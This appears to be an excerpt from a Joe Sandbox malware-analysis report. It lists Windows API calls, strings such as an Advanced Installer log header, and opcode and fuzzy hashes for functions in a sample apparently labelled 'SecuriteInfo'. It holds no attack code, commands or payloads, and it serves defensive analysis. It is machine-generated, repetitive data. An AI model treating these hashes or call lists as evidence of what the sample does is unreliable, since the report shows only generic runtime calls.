• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                                                                        • String ID: ATL:%p
                                                                                                                                                                        • API String ID: 2080323225-4171052921
                                                                                                                                                                        • Opcode ID: 69536be310a4214e088298cc82e0bd7ecea9eb227b49a3fe8de551857e376b49
                                                                                                                                                                        • Instruction ID: 50c8241d4a5a7f21a313bff18af0b08308e5a5f2ee9599077b9fcd9f54d82e2e
                                                                                                                                                                        • Opcode Fuzzy Hash: 69536be310a4214e088298cc82e0bd7ecea9eb227b49a3fe8de551857e376b49
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A51BC71D04B449FDB20CF69C941BAABBF4FF18714F00465EE995A7690EB70B988CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CABEF0: __Init_thread_footer.LIBCMT ref: 00CABF80
  • Part of subcall function 00CABEF0: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CABFBD
  • Part of subcall function 00CABEF0: __Init_thread_footer.LIBCMT ref: 00CABFD4
  • Part of subcall function 00CABEF0: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 00CABFFF
• CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CABA32
• SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00CABA50
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00CABA58
  • Part of subcall function 00BC72B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BC72E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend$Init_thread_footerWindow$AddressCreateLongProc
• String ID: SysListView32$K
• API String ID: 605634508-2788021393
• Opcode ID: ffa172ec13a715f8981d79920415de966c33577ac2825247b9674dded2556c35
• Instruction ID: 0ce718ea6c544b63b954ff4e055a4467829ba53ace166f00ec3dfc38f021f053
• Opcode Fuzzy Hash: ffa172ec13a715f8981d79920415de966c33577ac2825247b9674dded2556c35
• Instruction Fuzzy Hash: E8117C31344250BFD6249B16CC05F5BFBAAFFC5750F01461AFA44AB2A1C7B1AD00CAA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1FC3D414,?,?,00000000,00E05D89,000000FF,?,00D8B589,?,?,00D8B55D,?), ref: 00D8B62E
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8B640
• FreeLibrary.KERNEL32(00000000,?,00000000,00E05D89,000000FF,?,00D8B589,?,?,00D8B55D,?), ref: 00D8B662
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: bdfe1a4a592f7b4c14e6756c48f5874be3cfad6e13f97c9140aa9402334e1e3e
• Instruction ID: aa8541b95dd462f03f988e2e6618b9de563cfeaac97294d0c3e7c789f7cacd65
• Opcode Fuzzy Hash: bdfe1a4a592f7b4c14e6756c48f5874be3cfad6e13f97c9140aa9402334e1e3e
• Instruction Fuzzy Hash: 6301A231940719EFDB019F51DC09FAEBBB8FB04B21F040627E811B22E0DB759844CB94
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00CD569E
• GetProcAddress.KERNEL32(00000000), ref: 00CD56A5
• __Init_thread_footer.LIBCMT ref: 00CD56BC
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
• String ID: Dbghelp.dll$SymFromAddr
• API String ID: 3268644551-642441706
• Opcode ID: 61f0008305822b395c2bf03db5c4d6c1d67de161d2e3102a46827f160caf7a88
• Instruction ID: 5a0b4a34404dae8fdbc47ce122f1109d10daa3ecebdf74d22b26a9a0eff072ab
• Opcode Fuzzy Hash: 61f0008305822b395c2bf03db5c4d6c1d67de161d2e3102a46827f160caf7a88
• Instruction Fuzzy Hash: BA017CB1940744EFC710DF5AED45B14B7A8F708721F20462BFA25B73D0DB75A9088B21
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.KERNEL32(00E9946C,1FC3D414,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5), ref: 00BCB4FA
• GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5), ref: 00BCB57A
• EnterCriticalSection.KERNEL32(00E99488,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5,000000FF), ref: 00BCB733
• LeaveCriticalSection.KERNEL32(00E99488,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5,000000FF), ref: 00BCB754
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$Enter$FileLeaveModuleName
• String ID:
• API String ID: 1807155316-0
• Opcode ID: fbee9294035965b7d6095f0ea187ec08f21512eae2bad75b446b8b6da059fbf6
• Instruction ID: 48d8cf9753cc554de4951f075c73eec178ce52aa60be6d9fd6eb6d401ec15126
• Opcode Fuzzy Hash: fbee9294035965b7d6095f0ea187ec08f21512eae2bad75b446b8b6da059fbf6
• Instruction Fuzzy Hash: F1B18F71900249DFDB11CFA5D889FAEBBF4EF49314F14809EE844AB291CB75AD48CB60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMessageSendWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 799199299-0
                                                                                                                                                                        • Opcode ID: f98be7ef274b64e5edcf58d9bbf2eabc2b70e8db6f9ddc5956b8289eb377f0b0
                                                                                                                                                                        • Instruction ID: 7eae0175abf51c390b59b1bb01394edb7a1f958148cc33147a277996bc3bb600
                                                                                                                                                                        • Opcode Fuzzy Hash: f98be7ef274b64e5edcf58d9bbf2eabc2b70e8db6f9ddc5956b8289eb377f0b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A41CE323052069FCB148F99D898F66B7E9FF88311F0488BEE596CB161C732E855DB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00CC6B84
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00CC6BA6
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC6BCE
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00CC6CB7
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC6CE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 459529453-0
                                                                                                                                                                        • Opcode ID: 2b79ea887db46619443ae5d3421d6a0125de25db3955236dd4306d0bfd8ce8a9
                                                                                                                                                                        • Instruction ID: bf213fcd283fa8749f5c839ed8dc88059536fd7c0e24c72ad56366ce7f8f4e0e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b79ea887db46619443ae5d3421d6a0125de25db3955236dd4306d0bfd8ce8a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F51C4B0900254DFDB21CF58C945BAEBBF4EF00314F24815EE495AB391E775AE49CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BC028A
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BC0290
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00BC02B3
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00DA9B16,000000FF), ref: 00BC02DB
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00DA9B16,000000FF), ref: 00BC02E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1606019998-0
                                                                                                                                                                        • Opcode ID: 3f5e478730979996e389714dcd0a2f783b816a3327d24488a5b5547f3dfb0dd9
                                                                                                                                                                        • Instruction ID: b4d0e5db828ceae52968f8f3f0fd1c9c5689b5217cf3988c61ab2cdf4f6662e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f5e478730979996e389714dcd0a2f783b816a3327d24488a5b5547f3dfb0dd9
                                                                                                                                                                        • Instruction Fuzzy Hash: F91163B0A54219AFEB10DF94DC06FAFB7B8EB04704F104519F614AB2C1D7B5A6048BB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BD79FB
                                                                                                                                                                        • SendMessageW.USER32(?,?,?,0000102B), ref: 00BD7A58
                                                                                                                                                                        • SendMessageW.USER32(?,?,?,0000102B), ref: 00BD7AA7
                                                                                                                                                                        • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00BD7AB8
                                                                                                                                                                        • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00BD7AC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                        • Opcode ID: 93c7ed6421ab2a6e255b9ab425c6706da21c4162aa7a850223e4368c44c44d33
                                                                                                                                                                        • Instruction ID: accd8b6daae47713bdf2ff1d9fe474793bda88d65eb726d303bf68109e8d3dc5
                                                                                                                                                                        • Opcode Fuzzy Hash: 93c7ed6421ab2a6e255b9ab425c6706da21c4162aa7a850223e4368c44c44d33
                                                                                                                                                                        • Instruction Fuzzy Hash: 08214F31958346AAD220DF11CD44B5ABBF1BFED758F206B0EF1D4211A4E7F192848E86
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00BC3B26
                                                                                                                                                                        • SendMessageW.USER32(?,00000000,00000000), ref: 00BC3C22
                                                                                                                                                                          • Part of subcall function 00BC5580: SysFreeString.OLEAUT32(00000000), ref: 00BC5623
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFreeMessageSendStringWindow
                                                                                                                                                                        • String ID: AtlAxWin140$K
                                                                                                                                                                        • API String ID: 4045344427-841691727
                                                                                                                                                                        • Opcode ID: 5ca76d735fea9cbc5f9a74dcea4ef60477af2ee5503504e6049b08a7d756ac58
                                                                                                                                                                        • Instruction ID: f6fb575f8084bda9af5a5ad4228d08afcdacd1607e50db5e49896fd5ee861054
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ca76d735fea9cbc5f9a74dcea4ef60477af2ee5503504e6049b08a7d756ac58
                                                                                                                                                                        • Instruction Fuzzy Hash: A0910374600205EFDB14DF68C888F9ABBF9FF49724F148599F819AB291C771EA05CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,000000C9,00000000), ref: 00CFF6A3
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,1FC3D414,000000C9,00000000), ref: 00CFF731
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                        • String ID: << Advanced Installer (x86) Log >>$<3
                                                                                                                                                                        • API String ID: 3699736680-3345534290
                                                                                                                                                                        • Opcode ID: 52667877669f41d864bb8ee5864e2a8b3320e3974414cd5891b50507246401d3
                                                                                                                                                                        • Instruction ID: c288bee4b6e0b7f4b5adc13c3103f4fe38932b2a2eed698cd5f0681061c6f518
                                                                                                                                                                        • Opcode Fuzzy Hash: 52667877669f41d864bb8ee5864e2a8b3320e3974414cd5891b50507246401d3
                                                                                                                                                                        • Instruction Fuzzy Hash: F561D170900646DFDB01CF6DC98879ABBF4FF45314F10829EE420AB392DBB59A49CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,1FC3D414), ref: 00D10714
  • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
  • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocHeapObjectSingleWait
• String ID: *.*$.jar$.pack
• API String ID: 760676496-3892993289
• Opcode ID: ab6a81245219fa8294c7189396bf299cdef88c3d976dc48a7adf3d10fe5b6772
• Instruction ID: bedef8d1a83cc39381cdbabe2fc2eb4d7ea592c3c464249f9bbf1cec75f5b4d7
• Opcode Fuzzy Hash: ab6a81245219fa8294c7189396bf299cdef88c3d976dc48a7adf3d10fe5b6772
• Instruction Fuzzy Hash: A1516470A01609EFDB10EFA9D844BAEFBB4FF44314F144269E425A7291DB74E985CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00BC0652
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BC0658
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoOriginateLanguageException$combase.dll
• API String ID: 2574300362-3996158991
• Opcode ID: 138704a462d359ef00b330524de121ce51f33ce0f64e3b5202543277d61ac312
• Instruction ID: 8151dc95c741777b24c2cf2895d18751e33dd85fb1acab6c5803b5b452dce8b2
• Opcode Fuzzy Hash: 138704a462d359ef00b330524de121ce51f33ce0f64e3b5202543277d61ac312
• Instruction Fuzzy Hash: 31314F71910209EFDB10EFA4C905BEEB7F4EB04314F14857EE865A72D0EBB85A44CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000004), ref: 00C6F16A
• DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 00C6F177
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Destroy
• String ID: T$$|$
• API String ID: 3707531092-3050406125
• Opcode ID: 6e2ea5e7e1544f6f568ba9904ac06ffdf154c56181df0768b49df90d1dcfe438
• Instruction ID: 1cc736b877347c908045959a66928f15fe2d1efe71fab1b9d6fa2cbb827b6270
• Opcode Fuzzy Hash: 6e2ea5e7e1544f6f568ba9904ac06ffdf154c56181df0768b49df90d1dcfe438
• Instruction Fuzzy Hash: 1431DC70804689EFCB01EF69D90679EFBF4BF04314F50869DE064A3691DBB0AA08CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
